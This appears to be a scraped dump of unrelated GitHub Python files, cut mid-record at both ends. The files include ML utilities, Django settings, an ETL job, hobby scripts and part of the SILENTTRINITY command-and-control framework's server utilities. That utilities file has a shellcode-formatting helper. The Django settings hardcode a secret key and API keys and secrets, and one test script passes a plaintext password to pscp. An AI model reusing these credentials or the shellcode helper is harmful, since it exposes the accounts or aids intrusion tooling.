drawtype=PyIgnition.DRAWTYPE_CIRCLE, colour=(255, 200, 100), radius=3.0)\n self.source.CreateParticleKeyframe(10, colour=(200, 50, 20), radius=1.0, length=1)\n\n self.moving = False\n self.target_coords = None\n\n @property\n def coords(self):\n return self.source.pos\n\n @property\n def y(self):\n return self.source.pos[1]\n\n @property\n def x(self):\n return self.source.pos[0]\n\n def move(self, start, end):\n self.moving = True\n self.source.SetPos(start)\n self.source.pos = start\n self.target_coords = end\n\n def update(self):\n # Particle effects\n if self.source.curframe % 30 == 0:\n self.source.ConsolidateKeyframes()\n self.fire.Update()\n self.fire.Redraw()\n\n if self.moving:\n dx, dy = (self.target_coords[0] - self.x, self.target_coords[1] - self.y)\n stepx, stepy = (dx / 50., dy / 50.)\n self.source.SetPos((self.x + stepx, self.y + stepy))","repo_name":"leifktaylor/modeling","sub_path":"little/particles/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1857599985","text":"from typing import Union, Generator\nimport numpy as np\nfrom collections import Counter\n\nimport torch\n\nfrom dl.data.dataProvider import get_data_loaders, get_data_loader\nfrom dl.data.datasets import get_data\nfrom dl.data.samplers import dataset_user_indices, specify_class_simple\nfrom env.running_env import args\n\n\ndef deepcopy_dict(ori_dict: Union[dict, Generator]):\n generator = ori_dict.items() if isinstance(ori_dict, dict) else ori_dict\n copy_dict = dict()\n for key, param in generator:\n copy_dict[key] = param.clone()\n return copy_dict\n\n\ndef disp_num_params(model):\n total_param_in_use = 0\n total_all_param = 0\n for layer, layer_prefix in zip(model.prunable_layers, model.prunable_layer_prefixes):\n layer_param_in_use = layer.num_weight\n layer_all_param = layer.mask.nelement()\n total_param_in_use += layer_param_in_use\n total_all_param += layer_all_param\n print(\"{} remaining: {}/{} = {}\".format(layer_prefix, layer_param_in_use, layer_all_param,\n layer_param_in_use / layer_all_param))\n print(\"Total: {}/{} = {}\".format(total_param_in_use, total_all_param, total_param_in_use / total_all_param))\n return total_param_in_use / total_all_param\n\n\n# 计算总数据集的各分类分布\ndef dataset_dist() -> (np.ndarray, torch.Tensor):\n targets = np.array(get_data(args.dataset, \"train\").targets)\n total_num = len(targets)\n total_cnt = Counter(targets)\n global_dist = torch.tensor([total_cnt[cls] / total_num if cls in total_cnt else 0.00\n for cls in range(args.num_classes)])\n return targets, global_dist\n\n\ndef max_class(client_cnt: Counter) -> int:\n base_class = 0\n max_cnt = -1\n for cls in range(args.num_classes):\n if client_cnt[cls] > max_cnt:\n base_class = cls\n max_cnt = client_cnt[cls]\n return base_class\n\n\ndef simulation_federal_process():\n user_dict = dataset_user_indices(args.dataset, args.workers, args.non_iid)\n workers_loaders = get_data_loaders(args.dataset, data_type=\"train\", batch_size=args.batch_size,\n users_indices=user_dict, num_workers=0, pin_memory=False)\n test_loader = get_data_loader(args.dataset, data_type=\"test\", batch_size=args.batch_size,\n shuffle=True, num_workers=0, pin_memory=False)\n return test_loader, workers_loaders, user_dict\n\n\ndef get_data_ratio(user_dict: dict):\n ratios_list = []\n sorted_cid = sorted(user_dict.keys())\n targets, global_dist = dataset_dist()\n\n for client_id in sorted_cid:\n indices = user_dict[client_id]\n client_targets = targets[indices]\n client_sample_num = len(indices)\n client_target_cnt = Counter(client_targets)\n\n ratio = torch.tensor([client_target_cnt[cls] / client_sample_num if cls in client_target_cnt else 0.00\n for cls in range(args.num_classes)])\n ratios_list.append(ratio)\n return global_dist, ratios_list\n","repo_name":"Wolfsion/FedLA","sub_path":"federal/federal_util.py","file_name":"federal_util.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5092787537","text":"from operator import add, mul, sub\n\nsquare = lambda x: x * x\n\nidentity = lambda x: x\n\ntriple = lambda x: 3 * x\n\nincrement = lambda x: x + 1\n\ndef accumulate(combiner, base, n, term):\n while n > 0:\n base = combiner(base, term(n))\n n = n - 1\n return base\n\ndef compose1(f, g):\n \"\"\"Return a function h, such that h(x) = f(g(x)).\"\"\"\n def h(x):\n return f(g(x))\n return h\n\n\ndef make_repeater(f, n):\n \"\"\"Return the function that computes the nth application of f.\n\n >>> add_three = make_repeater(increment, 3)\n >>> add_three(5)\n 8\n >>> make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3 * 3 * 1\n 243\n >>> make_repeater(square, 2)(5) # square(square(5))\n 625\n >>> make_repeater(square, 4)(5) # square(square(square(square(5))))\n 152587890625\n >>> make_repeater(square, 0)(5) # Yes, it makes sense to apply the function zero times!\n 5\n \"\"\"\n return accumulate(compose1, lambda x : x, n, lambda x : f)\n\n\ndef take_turn(num_rolls, opponent_score, dice=six_sided):\n \"\"\"Simulate a turn rolling NUM_ROLLS dice, which may be 0 (Free Bacon).\n Return the points scored for the turn by the current player.\n\n num_rolls: The number of dice rolls that will be made.\n opponent_score: The total score of the opponent.\n dice: A function that simulates a single dice roll outcome.\n \"\"\"\n # Leave these assert statements here; they help check for errors.\n assert type(num_rolls) == int, 'num_rolls must be an integer.'\n assert num_rolls >= 0, 'Cannot roll a negative number of dice in take_turn.'\n assert num_rolls <= 10, 'Cannot roll more than 10 dice.'\n assert opponent_score < 100, 'The game should be over.'\n # BEGIN PROBLEM 3\n if num_rolls > 0:\n return roll_dice(num_rolls)\n else:\n return free_bacon(opponent_score)\n # END PROBLEM 3\n\n","repo_name":"AnthonyNg404/61A","sub_path":"hw/hw01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34762387329","text":"import requests\nfasta=requests.get('https://rest.uniprot.org/uniprotkb/A0A060IFB9.fasta').text\nf = open('test.fasta', 'a')\nf.write(fasta)\nf.close()\n#https://bionumpy.github.io/bionumpy/\nimport numpy as np\nimport bionumpy as bnp\nreads = bnp.open('test.fasta').read()\nprint(reads)\ngc_content = np.mean((reads.sequence == \"C\") | (reads.sequence == \"G\"))\nprint(gc_content)\n","repo_name":"animesh/scripts","sub_path":"readFasta.py","file_name":"readFasta.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23876264053","text":"from machine import ADC, Pin\nimport time\n\nred = Pin(18, Pin.OUT)\namber = Pin(19, Pin.OUT)\ngreen = Pin(20, Pin.OUT)\nall_leds = [red, amber, green]\n\nlight_sensor = ADC(Pin(26))\n\n\ndef set_all(leds_to_set, to_set, delay=None, reverse_order=False):\n if reverse_order:\n leds_to_set = reversed(leds_to_set)\n\n for led in leds_to_set:\n led.value(to_set)\n if delay:\n time.sleep(delay)\n\n\nwhile True:\n light = light_sensor.read_u16()\n light_percent = round(light/65535*100, 2)\n\n print(f\"{light_percent}%\")\n \n time.sleep(0.5)\n \n if light_percent < 10:\n set_all(all_leds, 0)\n elif light_percent < 30:\n set_all([red], 1)\n set_all([amber, green], 0)\n elif light_percent < 60:\n set_all([red, amber], 1)\n set_all([green], 0)\n else:\n set_all(all_leds, 1)\n","repo_name":"WalternativE/maker_advent_calendar","sub_path":"twelve_days_of_pi/day_06.py","file_name":"day_06.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42715697879","text":"# Django settings for pingismo project.\nimport os\n\nfrom unipath import Path\nimport dj_database_url\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nAUTH_USER_MODEL = 'base.User'\n\n# ADMINS = (\n# # ('Your Name', 'your_email@example.com'),\n# )\n# \n# MANAGERS = ADMINS\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'Asia/Taipei'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = False\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'badcm@4e2rx5m6sq910n9slkdn8#1p!q&mmtz0l1@noxtd38o^'\n\n# List of callables that know how to import templates from various sources.\n#TEMPLATE_LOADERS = (\n# 'django.template.loaders.filesystem.Loader',\n# 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n#)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'allauth.account.context_processors.account',\n 'allauth.socialaccount.context_processors.socialaccount',\n)\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'pingismo.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'pingismo.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n # 'django.contrib.admindocs',\n 'base',\n\n # allauth\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n\n # 'south',\n 'rest_framework',\n 'rest_framework.authtoken',\n\n 'bucketlist',\n)\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# Directories. Use relative path to this file instead of absolute path\nPROJECT_DIR = Path(__file__).ancestor(3)\nADMIN_MEDIA_PREFIX = ''\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = PROJECT_DIR.child('media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = PROJECT_DIR.child('static_collected')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n PROJECT_DIR.ancestor(1).child('static'),\n)\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n PROJECT_DIR.child('templates'),\n)\n\nDATABASES = {'default': dj_database_url.config()}\nALLOWED_HOSTS = ['houz.tw', '127.0.0.1', 'localhost']\nSESSION_COOKIE_HTTPONLY = False\n\n# allauth configurations\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_USER_MODEL_USERNAME_FIELD = None\nACCOUNT_USER_MODEL_EMAIL_FIELD = 'email'\nACCOUNT_LOGOUT_ON_GET = True\nACCOUNT_SIGNUP_FORM_CLASS = 'base.forms.SignupForm'\n\nGOOGLE_API_KEY = 'AIzaSyBKs2cUeB6GGVbksMr7bTOzfBK6rrAX_kg'\nUSERVOICE_API_KEY = 'OQImMizYBSftVKBeEEWuBA'\nUSERVOICE_API_SECRET = 'Op56l4akyiqo4IXnEXDJFXqFGwDWIN0jO8tM9swty9w'\n\nLOGIN_REDIRECT_URL = '/'\n\n# EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\n# Django REST Framework\nAPPEND_SLASH = False\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n # 'rest_framework.authentication.BasicAuthentication',\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n )\n}\n","repo_name":"MappingBird/web-application","sub_path":"src/django/pingismo/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42111147344","text":"from dataclasses import dataclass\nfrom typing import Tuple\n\nfrom hologram import JsonSchemaMixin\n\n\n@dataclass\nclass TupleMember(JsonSchemaMixin):\n a: int\n\n\n@dataclass\nclass TupleEllipsisHolder(JsonSchemaMixin):\n member: Tuple[TupleMember, ...]\n\n\n@dataclass\nclass TupleMemberFirstHolder(JsonSchemaMixin):\n member: Tuple[TupleMember, str]\n\n\n@dataclass\nclass TupleMemberSecondHolder(JsonSchemaMixin):\n member: Tuple[str, TupleMember]\n\n\ndef test_ellipsis_tuples():\n dct = {\"member\": [{\"a\": 1}, {\"a\": 2}, {\"a\": 3}]}\n value = TupleEllipsisHolder(\n member=(TupleMember(1), TupleMember(2), TupleMember(3))\n )\n assert value.to_dict() == dct\n assert TupleEllipsisHolder.from_dict(dct) == value\n\n\ndef test_member_first_tuple():\n dct = {\"member\": [{\"a\": 1}, \"a\"]}\n value = TupleMemberFirstHolder(member=(TupleMember(1), \"a\"))\n TupleMemberFirstHolder.from_dict(dct) == value\n value.to_dict() == dct\n\n\ndef test_member_second_tuple():\n dct = {\"member\": [\"a\", {\"a\": 1}]}\n value = TupleMemberSecondHolder(member=(\"a\", TupleMember(1)))\n TupleMemberSecondHolder.from_dict(dct) == value\n value.to_dict() == dct\n","repo_name":"dbt-labs/hologram","sub_path":"tests/test_tuple.py","file_name":"test_tuple.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"38290677468","text":"import json\nfrom os import environ\nfrom time import sleep\nfrom sqlalchemy import create_engine, Column, String, Table, func\nfrom sqlalchemy.exc import OperationalError\nfrom sqlalchemy.orm import sessionmaker, declarative_base\nimport pandas as pd\nfrom geopy import distance\n\nprint('Waiting for the data generator...')\nsleep(20)\nprint('ETL Starting...')\n\nwhile True:\n try:\n psql_engine = create_engine(environ[\"POSTGRESQL_CS\"], pool_pre_ping=True, pool_size=10)\n break\n except OperationalError:\n sleep(0.1)\nprint('Connection to PostgresSQL successful.')\n\n# Write the solution here\n\nBase = declarative_base()\n\n\n# Extract and Auto loads devices table in Device Object\nclass Device(Base):\n __table__ = Table(\"devices\", Base.metadata, autoload_with=psql_engine)\n\n\n# Function to calculate Distance between Two location\ndef calculate_distance(loc1, loc2):\n point1 = json.loads(loc1) # Json loads first location\n point2 = json.loads(loc2) # Json loads second location\n\n # return distance between two data points\n return distance.distance((point1[0]['latitude'], point1[0]['longitude']),\n (point2[0]['latitude'], point2[0]['longitude'])).km\n\n\n# PostgreSQL Database connection\nSession = sessionmaker(bind=psql_engine)\npsql_session = Session()\n\n# ORM Script to Aggregate maximum temperatures measured for every device per hours\nmax_temp_query = psql_session.query(Device.device_id, Device.time.hour.label('Hour'), func.max(Device.temperature)) \\\n .group_by(Device.device_id, Device.time.hour).all()\n\n# Convert into dataframe\nmax_temp_df = pd.read_sql_query(max_temp_query.statement, con=psql_engine)\n\n# ORM Script to Aggregate data points aggregated for every device per hours.\ndata_point_query = psql_session.query(Device.device_id, Device.time.hour.label('Hour'), func.count(1)) \\\n .group_by(Device.device_id, Device.time.hour).all()\n\n# Convert into dataframe\ndata_point_df = pd.read_sql_query(data_point_query.statement, con=psql_engine)\n\n# ORM Script to Partition the dataset based on the Device ID and Time Hour.\ndevice_distance_query = psql_session.query(Device.device_id,\n Device.time.hour.label('Hour'),\n Device.location,\n func.row_number().over(\n partition_by=(Device.device_id, Device.time.hour),\n order_by=Device.time.asc()\n ).label('row_number')\n ).all()\n\n# Convert into dataframe\ndevice_distance_df = pd.read_sql_query(device_distance_query.statement, con=psql_engine)\n\n# Add new Column with default value\ndevice_distance_df = device_distance_df.assign(location2='NULL')\n\n# Assign value of New Column with the previous location of same device to calculate distance.\ndevice_distance_df.loc[0, 'location2'] = device_distance_df.loc[0, 'location']\n\nfor i in range(1, len(device_distance_df)):\n device_distance_df.loc[i, 'C'] = device_distance_df.loc[i - 1, 'C']\n\n\n# Calculate Distance Between Two Locations\ndevice_distance_df['distance'] = device_distance_df.apply(\n lambda x: calculate_distance(x['location'], x['location2']) if x['row_number'] > 1 else 0, axis=1)\n\n\n# Calculate Total distance of device movement for every device per hours\ndevice_distance_df = device_distance_df.groupby(['device_id','Hour'])['distance'].sum()\n\n\n# Connection to the MySQL Database\nwhile True:\n try:\n mysql_engine = create_engine(environ[\"MYSQL_CS\"], pool_pre_ping=True, pool_size=10)\n break\n except OperationalError:\n sleep(0.1)\n\nprint('Connection to MySQL successful.')\n\n# MySQL Database Session\nSession = sessionmaker(bind=mysql_engine)\npsql_session = Session()\n\n# Store Aggregated temperature of Device per Hour into MySQL Table\nmax_temp_df.to_sql('device_Hourly_temperature', mysql_engine)\n\n# Store Aggregated datapoints of Device per Hour into MySQL Table\ndata_point_df.to_sql('device_hourly_datapoints', mysql_engine)\n\n# Store Aggregated distance of Device per Hour into MySQL Table\ndevice_distance_df.to_sql('device_hourly_distance', mysql_engine)\n","repo_name":"ashfaqahmad892/PAIR-Finance-Data-Engineering-Task","sub_path":"analytics/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24541810399","text":"import netifaces\nimport random\nimport string\nfrom functools import wraps\nfrom typing import get_type_hints, List\nfrom uuid import UUID\n\nfrom docopt import docopt\nfrom quart import jsonify\nfrom termcolor import colored\n\n\nclass CmdError(Exception):\n pass\n\n\ndef command(func):\n func._command = True\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n cmd_args = docopt(func.__doc__.strip(), argv=kwargs[\"args\"])\n validated_args = {}\n for name, hint in get_type_hints(func).items():\n try:\n value = cmd_args[f'<{name}>']\n except KeyError:\n try:\n value = cmd_args[f'--{name}']\n except KeyError:\n raise CmdError(f\"Unable to find '{name}' argument in command definition\")\n\n try:\n validated_args[name] = hint(value)\n except TypeError:\n # I'm still not sure if there's a way to dynamically cast Lists and Dicts using type hints\n if hint == List[int]:\n validated_args[name] = [int(x) for x in value]\n elif hint == List[str]:\n validated_args[name] = [str(x) for x in value]\n else:\n raise NotImplemented(f\"Casting for type '{hint}' has not been implemented\")\n\n return func(args[0], **validated_args)\n\n return wrapper\n\n\ndef register_cli_commands(cls):\n cls._cmd_registry = []\n for methodname in dir(cls):\n method = getattr(cls, methodname)\n if hasattr(method, '_command'):\n cls._cmd_registry.append(methodname)\n return cls\n\n\ndef check_valid_guid(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n try:\n UUID(kwargs[\"GUID\"])\n except Exception:\n return jsonify({}), 400\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef gen_random_string(length=8):\n return ''.join(random.sample(string.ascii_letters, int(length)))\n\n\ndef get_interfaces():\n return netifaces.interfaces()\n\n\ndef get_ipaddress(interface=None):\n if interface and (interface in get_interfaces()):\n return netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr']\n else:\n for iface in netifaces.interfaces():\n try:\n netif = netifaces.ifaddresses(iface)\n if netif[netifaces.AF_INET][0]['addr'] == '127.0.0.1':\n continue\n return netif[netifaces.AF_INET][0]['addr']\n except (ValueError, KeyError):\n continue\n\n return \"\"\n\n\n# https://github.com/zerosum0x0/koadic/blob/master/core/plugin.py\ndef convert_shellcode(shellcode):\n decis = []\n count = 0\n for i in range(0, len(shellcode), 2):\n count += 1\n hexa = shellcode[i:i + 2]\n deci = int(hexa, 16)\n\n if count % 25 == 0:\n decis.append(\" _\\\\n\" + str(deci))\n else:\n decis.append(str(deci))\n\n return \",\".join(decis)\n\n\ndef print_good(msg):\n print(f\"{colored('[+]', 'green')} {msg}\")\n\n\ndef print_bad(msg):\n print(f\"{colored('[-]', 'red')} {msg}\")\n\n\ndef print_info(msg):\n print(f\"{colored('[*]', 'blue')} {msg}\")\n\n\ndef print_banner(codename, version):\n logo = \"\"\"\n ........ \n .':ldxkkkkkxdoc,. \n .cdOOOOOOOOOOOOOOOxl,. \n .ckOOOOOOOOOOOOOOOOOOOko' \n .dOOOOOOOOOOOOOOOOOOOOOOOx; \n .oOOOOOOOOOOOOOOOOOOOOOOOOOx, \n :OOOOOOOOOOOOOOOOOOOOOOOOOOOo. \n .lOOOOxoccldOOOOOOOxoccldkOOOd' \n cOOkc'.,,..;xOOOkc'.,;..;dOOd. \n ,kOl.'cccl;.;kOOl.'cccl;.;kOc. \n .cOl..:cc:'.:kOOo..:cc:,.:kd. \n .oko,.''.'cxl;cdo,.',.'cxx, \n .oOOxoodkOd;',lOOxoodkOx, \n .oOxdocc:;;;;;::cloxkx, \n .'. .'. \n ....... ....... \n ..;:looddxxkkk; .''. .dkkxxdddolc;'. \n 'cdkOOxc;,,,cdOOo. 'dOk: :OOxl;,,,:dOOOxl,. \n .lkOOOOd'.;::;'.lOO: .cOd. ,xOx,.,::;'.lOOOOOd, \n ,xOOOOOOc.;o:;o: ;kkx; ;oc. 'okOl.,oc;oc.,kOOOOOkc. \n ,xOOOOOOOd,.,;;,..ox;,l:. 'l;,ox,.,;;;'.lOOOOOOOOc. \n .oOOOOOOOOOkl;,,;cxOdc:okl. .:xdc:oOkl;,,;cdOOOOOOOOOk, \n ,xOOOOOOOOOOOOOOOkdc;;:okOx:. ,okkdc:;:okOOOOOOOOOOOOOOOOc \n ,kOOOOOOOOOOOOOOx;.';;'.,dOOd:. 'okOx:..;;'.'oOOOOOOOOOOOOOOOc \n .dOOOOOOOOOOOOOOc.,oc:o: ;kOkc. ,xOOl.,oc;o:.,kOOOOOOOOOOOOOk; \n ;kOOOOOOOOOOOOOo..;cc:'.cOx; .oOd..;cc:'.cOOOOOOOOOOOOOOl. \n .:kOOOOOOOOOOOOOd;',,',oko. .cxd:',,',lkOOOOOOOOOOOOOo. \n ,dOOOOOOOOOOOOOOkxxkOx;. 'okkxxkOOOOOOOOOOOOOOx:. \n .;okOOOOOOOOOOOOOkd:. .,lxOOOOOOOOOOOOOkd:. \n .,cldxxkkxdoc;. .,cldxxkkxdoc;'. \n ...... ...... \n \"\"\"\n banner = \"\"\"\n _____ ______ _______ __________________ _____ ______________ __\n / ___// _/ / / ____/ | / /_ __/_ __/ __ \\/ _/ | / / _/_ __/\\ \\/ /\n \\__ \\ / // / / __/ / |/ / / / / / / /_/ // // |/ // / / / \\ /\n ___/ // // /___/ /___/ /| / / / / / / _, _// // /| // / / / / /\n /____/___/_____/_____/_/ |_/ /_/ /_/ /_/ |_/___/_/ |_/___/ /_/ /_/\n \"\"\"\n version = f\"\"\"\n Codename : {colored(codename, \"green\")}\n Version : {colored(version, \"green\")}\n \"\"\"\n\n print(colored(logo, \"green\"))\n print(colored(banner, \"white\"))\n print(version)\n","repo_name":"orf53975/SILENTTRINITY","sub_path":"Server/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"6604920059","text":"from fabric import Connection, Config\nimport time\nfrom multiprocessing import Process\nimport subprocess\n\ndef timing(connection):\n connection.run('uhd_rx_cfile -f 3555e6 --lo-offset=1.2M -N 10000 power1')\n connection.run('iq_to_power.py -p ~/power1 -w 5000 -n db_power1')\n subprocess.call('pscp -pw kirby -scp alliet@pc817.emulab.net:~/db_power1.csv ustar_test1.csv')\n return\n\ndef transmit(connection):\n print('start transmit:')\n connection.run('uhd_siggen_45sec --const --freq 3555e6 --amplitude 1 --gain 31.5 -v')\n print('end transmit!')\n\n\nif __name__ =='__main__':\n transmit_ssh = Connection(host='pc785.emulab.net', user='alliet',\n connect_kwargs={'key_filename': '/Users/allis/Powder/paramiko/id_rsa'})\n recieve_ssh = Connection(host='pc817.emulab.net', user='alliet',\n connect_kwargs={'key_filename': '/Users/allis/Powder/paramiko/id_rsa'})\n p1 = Process(target = transmit, args = (transmit_ssh,))\n\n p2 = Process(target = timing, args = (recieve_ssh,))\n\n p1.start()\n time.sleep(30)\n p2.start()\n","repo_name":"jiewang-web/powder-summer20","sub_path":"tutorials/collect-power-weather/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70382391555","text":"from server.core.db.databases import Color_db\n\n\ndef get_user_nickname(user_email: str):\n user_col = Color_db().get_user_col()\n user = user_col.find_one({\"_id\": user_email})\n nickname = user[\"nickname\"]\n\n return nickname\n\n\ndef delete_user(user_email: str):\n db = Color_db()\n user_col = db.get_user_col()\n post_col = db.get_post_col()\n\n user_col.delete_one({\"_id\": user_email})\n post_col.delete_many({\"userEmail\": user_email})\n","repo_name":"GRAM-DSM/Color-Backend-FastAPI","sub_path":"server/utils/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20460047376","text":"from collections import namedtuple\nfrom protocolbuffers.DistributorOps_pb2 import Operation\nimport protocolbuffers\nfrom distributor.ops import Op, RelationshipUpdate\nfrom distributor.system import Distributor\nfrom sims4.repr_utils import standard_repr\nimport services\nimport sims4.log\nlogger = sims4.log.Logger('DistributorMessages')\n\nclass MessageOp(Op):\n __qualname__ = 'MessageOp'\n\n def __init__(self, protocol_buffer, message_type, immediate=False):\n super().__init__(immediate=immediate)\n self.protocol_buffer = protocol_buffer\n self.message_type = message_type\n\n def __repr__(self):\n return standard_repr(self, self.message_type)\n\n def write(self, msg):\n msg.type = Operation.UI_UPDATE\n msg.data = self.protocol_buffer.SerializeToString()\n msg.data_context = self.message_type\n\ndef add_message_if_selectable(sim, msg_id, msg, immediate):\n if sim.is_selectable and sim.valid_for_distribution:\n distributor = Distributor.instance()\n op = MessageOp(msg, msg_id, immediate)\n distributor.add_op(sim, op)\n\ndef add_message_if_player_controlled_sim(sim, msg_id, msg, immediate):\n if not sim.is_npc and sim.valid_for_distribution:\n distributor = Distributor.instance()\n op = MessageOp(msg, msg_id, immediate)\n distributor.add_op(sim, op)\n\ndef add_object_message(obj, msg_id, msg, immediate):\n distributor = Distributor.instance()\n op = MessageOp(msg, msg_id, immediate)\n distributor.add_op(obj, op)\n\ndef add_object_message_for_sim_id(sim_id, msg_id, msg):\n sim_info = services.sim_info_manager().get(sim_id)\n if sim_info is not None:\n add_object_message(sim_info, msg_id, msg, False)\n else:\n logger.error('Unable to find Sim for id {} in add_object_message_for_sim_id', sim_id)\n\n_IconInfoData = namedtuple('IconInfoData', ('icon_resource', 'obj_instance', 'obj_def_id', 'obj_geo_hash', 'obj_material_hash'))\n\ndef IconInfoData(icon_resource=None, obj_instance=None, obj_def_id=None, obj_geo_hash=None, obj_material_hash=None):\n return _IconInfoData(icon_resource, obj_instance, obj_def_id, obj_geo_hash, obj_material_hash)\n\nEMPTY_ICON_INFO_DATA = IconInfoData()\n\ndef build_icon_info_msg(icon_info, name, msg):\n if name is not None:\n msg.name = name\n icon = icon_info[0]\n if icon is not None:\n msg.icon.type = icon.type\n msg.icon.group = icon.group\n msg.icon.instance = icon.instance\n else:\n 